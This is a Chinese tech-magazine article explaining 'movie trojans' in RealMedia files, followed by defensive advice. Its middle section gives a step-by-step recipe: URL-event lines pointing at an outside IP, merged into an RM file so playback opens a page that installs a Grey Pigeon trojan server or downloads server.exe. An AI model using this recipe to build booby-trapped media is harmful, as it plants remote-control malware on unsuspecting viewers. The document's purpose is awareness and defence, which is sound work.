防不胜防 看电影也会中木马病毒
【IT168 专稿】看到这个标题,可能不少用户会认为是在线看电影中木马。的确,如果你到不正规的网站在线看电影,这些网站完全可能被嵌入了网页恶意代码,甚至木马程序。因此,在线看电影中木马的可能性也不小。不过,这里我们要讲的并不是在线看电影,而是观看下载回来的影片,你也可能中木马,到底是怎么回事呢?这是因为当前有不少“影片木马”在作祟,下面看看其原理和相应的防范措施。
一、通通透透——电影木马的原理与特点
使用木马的关键就在于能否以优秀的欺骗(伪装)方式进入目标主机,伪装越好,进入的可能性也就越大,识别的难度也就越大。从而达到以假乱真的效果。更重要的是,伪装越好,杀毒软件也就越难查到木马的存在!显然,将木马进行伪装是非常有必要的,因为这将使黑客的攻城略地变得更加轻松自如!而影片木马正是充分利用了这一入侵思路,它非常巧妙地将自己“融入”到人们喜欢的影片中,在人们最不易设防的影片中潜伏了下来。影片木马的下载、发作过程如图所示。
![]() |
| 图1 |
首先,恶意网站大多并不会在本身网站中提供影片下载,这是因为网站本身就具有多重恶意代码或病毒,网民畏之如虎,怎敢随意前往下载影片?因此,将影片在具有人气的第三方网站或论坛中提供下载,是此类恶意网站最喜欢“下饵”的方式。这样做可以有两大优势:
一是潜在目标用户大大增多(借助第三方的人气);
二是不会被杀毒软件识别(杀毒软件一般不会检查视频文件)。
在完成影片的下载后,播放影片是每位影迷必做的事情。此时隐藏在影片中的木马就会在影片播放到指定发作的时间开始被执行,并实现如下几类破坏:自动打开IE浏览器,连接至具有恶意代码的网站;自动随影片的打开,将潜伏在影片中的木马服务器端植入目标计算机;自动打开目标计算机的重要端口和服务,以便给入侵做好铺垫;疯狂打开指定的网页,使目标计算机因系统资源耗尽而崩溃。
有了这个极容易进入目标主机的途径,影片木马被利用的机率和危害性越来越大。那么,影片木马究竟是如何制作出来的?又该如何进行防范呢?下面我们通过一个简单的实例进行说明。
二、实战揭秘——电影木马制作
制作RM影片木马通常分为一下两步:一是让RM影片在播放时自动弹出IE浏览器窗口,并自动访问相应的网页,这一点很容易做到;二是在指定的网页中要放置恶意代码、病毒等程序。两者结合后,就是一个标准的RM影片木马了。下面,让我们来看看制作过程。
1.让影片在播放时自动弹出浏览器窗口
让RM影片在播放时自动弹出IE浏览器窗口,并自动访问相应的网页这一步的制作,需使用Helix Producer Plus来完成。
在下载完毕并安装完成后,首先使用任一款播放器打开要捆绑弹出网页代码的RM影片,在其中观察一下影片播放的时间长度。在如图所示中,可以看出影片的长度是10分21秒。
![]() |
| 图2 |
根据影片的总长度,我们可以决定在影片中隔多少时间放一次弹出网页代码,从而使影片的播放中处处“危机四伏”。假设,我们打算实现如下目的:
在影片“009.rm”的播放中,在00:01:01至00:01:30这个时间范围中,自动弹出“http:// 218.93.223.135/index.asp”页面。
在影片“009.rm”的播放中,在00:03:00至00:03:30这个时间范围中,自动弹出“http:// 218.93.223.135/web/index.asp”页面。
根据这个目标,开始在RM中捆绑网页弹出代码,方法如下:
第1步:新建一个文本文件,在其中输入如下命令:
u 00:01:01 00:01:30 http://218.93.223.135/index.asp
u 00:03:00 00:03:30 http://218.93.223.135/web/index.asp
输入完毕后,将文件保存成名为“001”(可以任意命名)的文本文件。
![]() |
| 图3 |
提示:很多恶意网站还会直接指向为“http://218.93.223.135/server.exe”这样的木马程序下载、运行网址,这样对于某些操作系统来说,将意味着可以直接运行恶意程序。
现在来解释一下代码的含义,以第一行代码为例,代码中的u表示URL事件,这个事件将激活IE浏览器的自动弹出;00:01:00是起始时间;00:01:30.001:10是结束时间;后面则是指定的要自动打开的网页。
第2步:打开“C:\Program Files\Real\Helix Producer Plus\RealMediaEditor\”文件夹,找到如图所示的名为Rmedtgui.exe文件。
第3步:双击运行Rmedtgui.exe文件后,在弹出的如图所示窗口中,依次单击“File”→“Open RealMedia File”菜单。
![]() |
| 图4 |
第4步:在将名为“009.rm”的文件添加进来后,再依次单击“Tools”→“Merge Events”菜单。如图所示。
![]() |
| 图5 |
第5步:在弹出的对话框中,将前面生成的名为“001.txt”文件添加进来。如图所示。
![]() |
| 图6 |
第6步:在单击“打开”按钮后,将出现如图所示的合并事件进度框。
第7步:在合并完成后,依次单击“File”→“Save RealMedia File As”菜单。将写入事件的RM文件另存为一个新的RM文件,如图所示的“0091.rm”。
![]() |
| 图7 |
第8步:稍后,将出现如图所示的保存过程,这个过程将会把写入事件后的RM文件创建出来。
第9步:在保存完毕后,将Rmedtgui.exe窗口关闭。并用RealPlayer播放生成的00.91文件,在播放到指定时间时,就会自动弹出如图所示的浏览窗口(RealPlayer内置了浏览器,所以会使用内置的浏览器。),并打开指定的网页页面内容。
![]() |
| 图8 |
2.在网页中添加木马
成功完成前面的操作后,就可以在网页中添加木马了。添加的木马的操作有两步:一是使用木马工具制作出一个服务器端(这里我们以灰鸽子为例)。如图所示。
![]() |
| 图9 |
二是使用制作网页木马工具,指定访问特定的网页时能够自动运行木马服务器端。如图所示。
![]() |
| 图10 |
接着,将具有灰鸽子服务器端和能够调用灰鸽子服务器端的网页一起上传到服务器指定的路径。
提示:这个路径的最终访问网址,一定要与RM影片中指定网址相同。这样才能实现通过影片中的恶意代码激活网站中的木马的目的,进而通过客户端程序控制自动安装了木马服务器端的目标主机。
三、应对措施——电影木马的防范
在知晓了影片木马的危害后,现在再来看看如何防范RM影片木马。通常,我们可以使用如下的几种方法来解决问题:
第一、不使用RealPlayer播放RM文件。推荐使用KMPlayer这类第三方播放器进行播放,这样RM影片中的自动弹出代码将不会被响应,这是一种完全被动的防御方法。如图所示。
![]() |
| 图11 |
第二、使用各种防火墙禁止RealPlayer对网络的访问。其优势是RealPlayer无法使用内置的浏览器连接至指定的网页,进而杜绝了网页中的木马服务器端的下载。其不足之处是在线播放的影片没法使用RealPlayer观看。
第三、下载专用清除工具。如“Real文件广告清除工具”这类的工具,就可以把RM影片中内置的恶意代码清除掉,这是一种比彻底的解决方法。
![]() |
| 图12 |
除了RM影片木马外,实际上还有很多种影片都可以被人为地添加上木马或恶代码,针对这种问题,对于电脑初学者来说,目前比较好的解决方法是使用第三方播放器,或是使用防火墙禁用播放器的网络访问功能来临时解决问题。当然,大家在日常上网和看电影过程中,保持高度警惕也非常重要,一旦发现有任何异常,立即断网,并对计算机杀毒,则可能减少很多不必要的损失。
